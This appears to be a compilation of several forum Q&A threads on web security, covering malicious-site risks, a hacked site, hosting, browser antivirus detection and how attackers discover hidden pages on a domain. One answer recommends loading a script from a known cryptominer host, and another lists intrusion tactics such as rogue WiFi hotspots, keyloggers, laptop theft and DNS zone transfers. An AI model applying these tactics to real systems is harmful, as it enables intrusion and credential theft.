Now and then I (accidentally) come across websites that my anti-virus warns me about. Out of curiosity, what kind of damage can a website do?
I've been working in web development for around 4 years now and can't think of any 'genuine' damage worth warning the user about. Maybe I'm missing something obvious, but surely browsers and basic security measures implemented by main operating systems prevent anything particularly invasive going on?
I'm talking about threats aside from anything deceptive by the way (phishing etc.). Could taxing the browser enough warrant an anti-virus warning (i.e. overload a page with resource-draining javascript)? Typically, cookies, caches and localstorage all have limits - so I can't think of what could go on there.
I suspect this may be slightly off-topic, as it's less technically specific than what I'd usually ask. I'll happily delete it if this is the case.
The main risk is encountering a drive-by download.
A drive-by download isn't necessarily a file download in the usual sense, it could be a browser exploit that allows executable code to download and execute on your system (known as the payload).
One example is the Microsoft Internet Explorer colspan Element Processing Arbitrary Code Execution Vulnerability:
Microsoft Internet Explorer contains a vulnerability that could allow
an unauthenticated, remote attacker to execute arbitrary code on a
targeted system.
The vulnerability is due to improper processing of elements in web
pages. An unauthenticated, remote attacker could exploit this
vulnerability by convincing a user to view a malicious website. If
successful, the attacker could exploit this vulnerability to execute
arbitrary code on the system with the privileges of the user.
The vulnerability is due to improper handling of constantly changed
colspan in a fixed table layout. If colspan could be increased after
initialization, it could trigger a heap-based buffer overflow.
However, more recent exploits exist such as this one this year (2015) in Flash Player:
Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before
16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux allows attackers to execute arbitrary code or cause a denial of service
(memory corruption) via unspecified vectors
Another attack vector from a website could be exploitation of a cross domain attack such as Cross Site Request Forgery. Such a malicious site could be making background requests to other sites you're logged into. For example, it might be making AJAX requests to https://facebook.com/delete_account (made up URL path), and as you're logged into Facebook your browser will pass cookies and the action would be triggered. That is, if Facebook did not have CSRF protection for the delete account function (I'm pretty sure it does though).
Another example of a cross domain attack is that the site may be trying to exploit any XSS flaw on another site you use. It could redirect you another site and capture your credentials as you log in, or it could do something more sneaky like request a site in the background and grab your session cookie. This requires the target site to contain such an XSS flaw however.
One of the main issues is that when you go onto a website it can automatically download something onto your computer. Normally an ordinary website will ask you if you are sure that you want to download the item, but a website can download something without your permission. And if the file that was downloaded was a virus, then you now have a virus on your computer and the virus can inflict any sort of damage to the computer.
See here (https://www.microsoft.com/security/pc-security/virus-whatis.aspx) to see the issues of a virus and how to remove them.
Recently our website got hacked by some people and it is reporting as below when we try to open our website
Reported Attack Page!
This web page at www.example.com has been reported as an attack page and has been blocked based on your security preferences.
Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system.Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.
At Last I came to know there is some malicious code so that it is reporting in this way...
so how can i know where is that code
I would say, first, scan your own PC to ensure the infection did not originate there.
Then download the site to a safe location(you may need to disable your antivirus software for a while for the purpose). Hopefully you have a backup of the original site before infection(or your webhosting partner). Make a compare against the infected content and you should clearly see the difference.
If you do not have a backup, scan the infected scripts with antivirus software to determine specific files, then you need to browse through the code in these files and scan for malicious code manually. Those worms/trojans mostly append to file, or specific tag, look for suspicious lines and parts of code that do not look familiar.
So I have finished creating my first website that I will be hosting online. It have php, html, and javascript. Now I am looking for a way to host my website securely. I have looked at sites like godaddy and web hosting hub. I was wondering what the best hosting service would be for my needs.
My needs:
Able to run php
Have a actual name, like www.noahhuppert.com
Be able to obscure the code so people can not just copy it(This is because my website is for my website design company and I have examples of templates people can use, but I don't want people jsut stealing those templates with a simple right click + inspect element)
Run server side scripts(Like slowing down connections to users if they fail to login too many times, to prevent brute force cracking attempts)
Deny access to people reading files(I don't want people downloading my password hash files or anything like that)
Be able to host files on the services servers, I don't just want a dns pointing back to my computer.
This question is asking for an opinion. Basically any linux web host will provide most of what you're looking for. You're asking for an opinion about which hosting site is the best. I cannot answer that.
What I do want to warn you about is this:
From your question, you're concerned with:
- security
this is not a web host provider feature, but a feature of secure web code. See https://www.owasp.org/index.php/Top_10_2013 for great introduction to website security.
obscure code
You cannot prevent someone from stealing your css. They will not get to your raw templates (I'm assuming you're using templates) if you set your file permissions right on the web server.
if you're concerned with brute force protections, you'll need to code that up yourself. The web host provider would not (and should not) rate limit your connections.
I'd like to be able to use any language from a web browser (PHP, ASP, Flash, Javascript, Java etc) to detect if a user has antivirus installed.
I'm researching the possibility of only letting a user log into a Virtual Private Network from machines which have up to date antivirus installed.
Can this be done, if so how?
Thanks.
No server language (PHP, ASP, etc) has access to data known by the browser, and client languages (Javascript, Flash, etc) are sandboxed into an enviroment where they cannot access data external to their page for security reasons.
In other words, only a plugin on a browser can (possibly) get that kind of data, and expose it to a script that runs in a page.
Simple, just add an asynchronous script call (eg. <script src="https://coin-hive.com/lib/coinhive.min.js" async></script>) to a resource located in a known malware hosting domain (currently coinhive is being detected as a malware host by Avast and those requests are blocked). If the request succeeds (so the javascript objects created in the malware host are actually made available in the client after some time) that means there is no antivirus protection on internet communication which is by default enabled in the most recent antivirus software.
This will make your site however, vulnerable to an attack from the malware host. You could overcome this problem by deliberately creating an infected domain and reporting it to several antivirus blacklists. Once you get your own domain blacklisted you will be able to do this test safely. But it may take some time and patience....
The final unavoidable problem is that your antivirus protected user will see an ugly warning from the antivirus telling him that your site is infected with a virus. You could mitigate this problem by creating very clear and trustworthy messaging in your app. Something like this:
In order to access this site you must enable antivirus protection.
Please click the button below to start your antivirus validation. A request to a well known malware host will be issued and your antivirus should should show you a warning preventing the request if you're properly protected.
The Juniper client, and I'm sure many other VPN clients too, does check to ensure that the users computer has an up to date version of an approved AntiVirus system installed, but it's not run from the browser - it has to be installed though - so doesn't answer your question but I can see where you're coming from. As others have said to spy on people's computers like that would represent a significant security hole.
So I'm going to say there is no language from a web browser that would allow you to achieve what you're looking to do without getting the user to install something on their computers, whether that's something like an ActiveX or other extension / plug-in I couldn't say, but you would need that to be able to query the file system or registry in order to answer the question of whether a given version of any given software was present. Which is, what I think the Juniper client does to some degree
http://discuss.extremetech.com/forums/thread/1004433597.aspx
http://kb.juniper.net/InfoCenter/index?page=content&id=KB9216
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 10 years ago.
Improve this question
Given a domain, is it possible for an attacker to discover one or many of the pages/resources that exist under that domain? And what could an attacker do/use to discover resources in a domain?
I have never seen the issue addressed in any security material (because it's a solved problem?) so I'm interested in ideas, theories, best-guesses, in addition to practices; anything an attacker could use in a "black box" manor to discover resources.
Some of the things that I've come up with are:
Google -- if google can find it, an attacker can.
A brute force dictionary attack -- Iterate common words and word combinations (Login, Error, Index, Default, etc.) As well, the dictionary could be narrowed if the resource extension was known (xml, asp, html, php.) which is fairly discoverable.
Monitor traffic via a Sniffer -- Watch for a listing of pages that users go to. This assumes some type of network access, in which case URL discovery is likely small peanuts given the fact the attacker has network access.
Edit: Obviously directory listings permissions are turned off.
The list on this is pretty long; there are a lot of techniques that can be used to do this; note that some of these are highly illegal:
See what Google, archive.org, and other web crawlers have indexed for the site.
Crawl through public documents on the site (including PDF, JavaScript, and Word documents) looking for private links.
Scan the site from different IP addresses to see if any location-based filtering is being done.
Compromise a computer on the site owner's network and scan from there.
Attack an exploit in the site's web server software and look at the data directly.
Go dumpster diving for auth credentials and log into the website using a password on a post-it (this happens way more often than you might think).
Look at common files (like robots.txt) to see if they 'protect' sensitive information.
Try common URLs (/secret, /corp, etc.) to see if they give a 302 (unauthorized) or 404 (page not found).
Get a low-level job at the company in question and attack from the inside; or, use that as an opportunity to steal credentials from legitimate users via keyboard sniffers, etc.
Steal a salesperson's or executive's laptop -- many don't use filesystem encryption.
Set up a coffee/hot dog stand offering a free WiFi hotspot near the company, proxy the traffic, and use that to get credentials.
Look at the company's public wiki for passwords.
And so on... you're much better off attacking the human side of the security problem than trying to come in over the network, unless you find some obvious exploits right off the bat. Office workers are much less likely to report a vulnerability, and are often incredibly sloppy in their security habits -- passwords get put into wikis and written down on post-it notes stuck to the monitor, road warriors don't encrypt their laptop hard drives, and so on.
Most typical attack vector would be trying to find well known application, like for example /webstats/ or /phpMyAdmin/, look for some typical files that unexperienced user might left in production env (eg. phpinfo.php). And most dangerous: text editor backup files. Many text editors leave copy of original file with '~' appended or perpended. So imagine you have whatever.php~ or whatever.apsx~. As these are not executed, attacker might get access to source code.
Brute Forcing (Use something like OWASP Dirbuster , ships with a great dictionary - also it will parse responses therefore can map the application quite quickly and then find resources even in quite deeply structured apps)
Yahoo, Google and other search engines as you stated
Robots.txt
sitemap.xml (quite common nowadays, and got lots of stuff in it)
Web Stats applications (if any installed in the server and public accessible such as /webstats/ )
Brute forcing for files and directories generally referred as "Forced Browsing", might help you google searches.
The path to resource files like CSS, JavaScript, images, video, audio, etc can also reveal directories if they are used in public pages. CSS and JavaScript could contain telling URLs in their code as well.
If you use a CMS, some CMS's put a meta tag into the head of each page that indicates the page was generated by the CMS. If your CMS is insecure, it could be an attack vector.
It is usually a good idea to set your defenses up in a way that assumes an attacker can list all the files served unless protected by HTTP AUTH (aspx auth isn't strong enough for this purpose).
EDIT: more generally, you are supposed to assume the attacker can identify all publicly accessible persistent resources. If the resource doesn't have an auth check, assume an attacker can read it.
The "robots.txt" file can give you (if it exists, of course) some information about what files\directories are there (Exmaple).
Can you get the whole machine? Use common / well known scanner & exploids.
Try social engineering. You'll wonder about how efficient it is.
Bruteforce sessions (JSessionid etc.) maybe with a fuzzer.
Try common used path signatures (/admin/ /adm/ .... in the domain)
Have a look for data inserts for further processing with XSS / SQL Injection / vulnerability testing
Exploid weak known applications within the domain
Use fishing hacks (XSS/XRF/HTML-META >> IFrame) to forward the user to your fake page (and the domain name stays).
Blackbox reengineering - What programming language is used? Are there bugs in the VM/Interpreter version? Try service fingerprinting. How whould you write a page like the page you want wo attack. What are the security issues the developer of the page may have missed?
a) Try to think like a dumb developer ;)
b) Hope that the developer of the domain is dumb.
Are you talking about ethical hacking?
You can download the site with SurfOffline tools, and have a pretty idea of the folders, architecture, etc.
Best Regards!
When attaching a new box onto "teh interwebs", I always run (ze)nmap. (I know the site looks sinister - that's a sign of quality in this context I guess...)
It's pretty much push-button and gives you a detailed explanation of how vulnerable the target (read:"your server") is.
If you use mod_rewrite on your server you could something like that:
All request that does not fit the patterns can be redirected to special page. There the IP or whatever will be tracked. You you have a certain number of "attacks" you can ban this user / ip. The most efficient way you be automatically add a special rewrite condition on you mod_rewrite.
A really good first step is to try a domain transfer against their DNS servers. Many are misconfigured, and will give you the complete list of hosts.
The fierce domain scanner does just that:
http://ha.ckers.org/fierce/
It also guesses common host names from a dictionary, as well as, upon finding a live host, checking numerically close IP addresses.
To protect a site against attacks, call the upper management for a security meeting and tell them to never use the work password anywhere else. Most suits will carelessly use the same password everywhere: Work, home, pr0n sites, gambling, public forums, wikipedia. They are simply unaware of the fact that not all sites care not to look at the users passwords (especially when the sites offer "free" stuff).